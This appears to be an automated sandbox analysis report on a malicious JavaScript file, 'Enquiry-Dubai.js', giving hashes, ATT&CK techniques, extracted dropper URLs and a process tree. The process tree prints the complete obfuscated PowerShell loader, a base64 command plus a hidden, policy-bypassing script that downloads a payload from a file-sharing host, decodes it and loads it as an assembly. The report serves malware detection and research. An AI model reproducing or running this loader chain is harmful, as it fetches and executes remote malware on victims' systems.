e3061de8d38aee7575d7a5c5b169563af5d3b61568ca9f65d49dbadc20e6f0c9

General

Target

Enquiry-Dubai.js
Size

239KB
MD5

05f7c478f947dee826a7163e024ebf84
SHA1

bfdee493d4b9e4b218bce16128163b66b36abb4b
SHA256

e3061de8d38aee7575d7a5c5b169563af5d3b61568ca9f65d49dbadc20e6f0c9
SHA512

6b0a15b1b7d3b113062b959007411bb1c7e09f00dd00df588add8be1d828aadfa224f931fcb08ed72525e42c0c46689a4e497fc55b7a1de7ebeae35b78f3fa7d
SSDEEP

6144:4HH6v3suAkikHH6v3sY7HH6v3suAkikHH6v3sy:yH6vLAqH6vvH6vLAqH6vX

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

5 2752 powershell.exe
6 2752 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2380 powershell.exe
2752 powershell.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2380 powershell.exe
2752 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2380 powershell.exe
Token: SeDebugPrivilege 2752 powershell.exe

flow	pid	process
5	2752	powershell.exe
6	2752	powershell.exe

pid	process
2380	powershell.exe
2752	powershell.exe

pid	process
2380	powershell.exe
2752	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	2752	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

wscript.exepowershell.exe

description	pid	process	target process
PID 1644 wrote to memory of 2380	1644	wscript.exe	powershell.exe
PID 1644 wrote to memory of 2380	1644	wscript.exe	powershell.exe
PID 1644 wrote to memory of 2380	1644	wscript.exe	powershell.exe
PID 2380 wrote to memory of 2752	2380	powershell.exe	powershell.exe
PID 2380 wrote to memory of 2752	2380	powershell.exe	powershell.exe
PID 2380 wrote to memory of 2752	2380	powershell.exe	powershell.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Enquiry-Dubai.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAYgB0AG8AaQBtAGEAZwBlAFUAcgBsACAAPQAgAHAAWABBAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAPQAyAEEAYQBfAGIAVwBvADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAOQBjADYAMgBjADEANwAzADAAOQA0ADUAMQA3ADYAYQAwADkAMAA0AGYAIABwAFgAQQA7AGIAdABvAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBiAHQAbwBpAG0AJwArACcAYQBnAGUAQgB5AHQAZQBzACAAPQAgAGIAdABvAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAnACsAJwBiAHQAbwBpAG0AYQBnAGUAVQByAGwAKQA7AGIAdABvAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgAnACsAJwBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAGIAdABvAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7AGIAdABvAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAHAAWABBADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwArACcAcABYAEEAOwBiAHQAbwBlAG4AZABGAGwAYQBnACAAPQAgAHAAWABBADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBwAFgAQQA7AGIAdABvAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAYgB0AG8AaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAYgB0AG8AcwB0AGEAcgB0AEYAbABhAGcAKQA7AGIAdAAnACsAJwBvAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABiAHQAbwBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKABiAHQAbwBlAG4AZABGAGwAYQBnACkAOwBiAHQAbwBzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAnACsAJwAgAGIAdABvAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAYgB0AG8AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGIAdABvAHMAdABhACcAKwAnAHIAdABJAG4AZABlAHgAIAArAD0AIABiAHQAbwBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAYgB0AG8AYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAYgB0AG8AZQBuAGQASQBuAGQAZQB4ACAALQAgAGIAdABvAHMAdABhAHIAdABJAG4AZABlAHgAOwBiAHQAbwBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAGIAdABvAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABiAHQAbwBzAHQAJwArACcAYQByAHQASQBuAGQAZQB4ACwAIABiAHQAbwBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAYgB0AG8AYgBhAHMAZQAnACsAJwA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAJwArACcAbgAgACgAYgB0AG8AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwBDAGgAYQByAEEAcgAnACsAJwByAGEAeQAoACkAJwArACcAIABxAHAAbwAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABiAHQAbwBfACAAfQApAFsALQAxAC4ALgAtACgAYgB0AG8AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AGIAdABvAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwAnACsAJwB0AHIAaQBuAGcAKABiACcAKwAnAHQAbwBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AGIAdABvAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAJwArACcAdABpAG8AbgAuAEEAcwBzAGUAbQAnACsAJwBiAGwAeQBdADoAOgBMAG8AYQBkACgAYgB0AG8AYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AGIAdABvACcAKwAnAHYAYQBpACcAKwAnAE0AZQB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKABwAFgAQQBWAEEASQBwAFgAQQApADsAYgB0AG8AdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvACcAKwAnAGsAZQAoAGIAdABvAG4AdQBsAGwALAAgAEAAJwArACcAKABwAFgAQQB0AHgAdAAuADAAMgBlAHMAbgBlAGMAaQBsAC8AZQBsAGkAZgAvAHoAaQBiAC4AeABpAG0AZQAnACsAJwBoAGMALwAvADoAcwBwAHQAdABoAHAAWABBACwAIABwAFgAQQBkAGUAcwBhAHQAaQB2AGEAZAAnACsAJwBvAHAAWABBACwAIABwAFgAQQBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWABBACwAIABwAFgAQQBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWABBACwAIABwAFgAQQBNAFMAQgB1AGkAbABkAHAAWABBACwAJwArACcAIABwAFgAQQBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWABBACwAIABwAFgAQQBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWABBACwAcABYAEEAZABlACcAKwAnAHMAYQB0AGkAdgBhAGQAbwBwAFgAQQAsAHAAWABBAGQAZQBzAGEAdABpAHYAYQBkAG8AcABYAEEALABwAFgAQQBkAGUAcwBhAHQAaQB2AGEAZABvAHAAWABBACwAcAAnACsAJwBYAEEAZABlAHMAYQB0AGkAdgBhAGQAbwBwACcAKwAnAFgAQQAsAHAAWABBAGQAZQBzAGEAdABpAHYAYQBkAG8AcABYAEEALABwAFgAQQAxAHAAWABBACwAcABYAEEAZABlAHMAYQB0AGkAdgBhAGQAbwBwAFgAQQApACcAKwAnACkAOwAnACkALQBDAFIARQBwAGwAYQBjAGUAIAAgACcAcQBwAG8AJwAsAFsAYwBoAGEAcgBdADEAMgA0ACAALQBSAEUAcABMAGEAYwBFACgAWwBjAGgAYQByAF0AOQA4ACsAWwBjAGgAYQByAF0AMQAxADYAKwBbAGMAaABhAHIAXQAxADEAMQApACwAWwBjAGgAYQByAF0AMwA2ACAALQBDAFIARQBwAGwAYQBjAGUAIAAnAHAAWABBACcALABbAGMAaABhAHIAXQAzADkAKQAgAHwAJgAoACAAJABzAEgARQBsAEwAaQBEAFsAMQBdACsAJABzAEgARQBsAGwASQBEAFsAMQAzAF0AKwAnAHgAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2380
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('btoimageUrl = pXAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f pXA;btowebClient = New-Object System.Net.WebClient;btoim'+'ageBytes = btowebClient.DownloadData('+'btoimageUrl);btoimageText = [System.Text.Encodin'+'g]::UTF8.GetString(btoimageBytes);btostartFlag = pXA<<BASE64_START>>'+'pXA;btoendFlag = pXA<<BASE64_END>>pXA;btostartIndex = btoimageText.IndexOf(btostartFlag);bt'+'oendIndex = btoimageText.IndexOf(btoendFlag);btostartIndex -ge 0 -and'+' btoendIndex -gt btostartIndex;btosta'+'rtIndex += btostartFlag.Length;btobase64Length = btoendIndex - btostartIndex;btobase64Command = btoimageText.Substring(btost'+'artIndex, btobase64Length);btobase'+'64Reversed = -joi'+'n (btobase64Command.ToCharAr'+'ray()'+' qpo ForEach-Object { bto_ })[-1..-(btobase64Command.Length)];btocommandBytes = [System.Convert]::FromBase64S'+'tring(b'+'tobase64Reversed);btoloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::Load(btocommandBytes);bto'+'vai'+'Method = [dnlib.IO.Home].GetMethod(pXAVAIpXA);btovaiMethod.Invo'+'ke(btonull, @'+'(pXAtxt.02esnecil/elif/zib.xime'+'hc//:sptthpXA, pXAdesativad'+'opXA, pXAdesativadopXA, pXAdesativadopXA, pXAMSBuildpXA,'+' pXAdesativadopXA, pXAdesativadopXA,pXAde'+'sativadopXA,pXAdesativadopXA,pXAdesativadopXA,p'+'XAdesativadop'+'XA,pXAdesativadopXA,pXA1pXA,pXAdesativadopXA)'+');')-CREplace 'qpo',[char]124 -REpLacE([char]98+[char]116+[char]111),[char]36 -CREplace 'pXA',[char]39) |&( $sHElLiD[1]+$sHEllID[13]+'x')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
14ea0a05337685c43f725030eb70d521

SHA1
1cc3c4d73adc8f5836aaca617342458a404f3abc

SHA256
67595e8d5eb56786d63513f9cf6440b30ee121519d785a14a7b9cef2bd7a8e97

SHA512
331745076b2ee1b17d993638b1eda62ae0c429cde5c722a9ff8b9eaa3be5ddbb5d6a9e40a5da986465ee2f210a7290577cd5dbcc247d89cfb8810cc2179bc4dd

Download Submit
memory/2380-4-0x000007FEF5A9E000-0x000007FEF5A9F000-memory.dmp

Filesize
4KB

Download
memory/2380-5-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2380-6-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2380-12-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download
memory/2380-13-0x000007FEF57E0000-0x000007FEF617D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing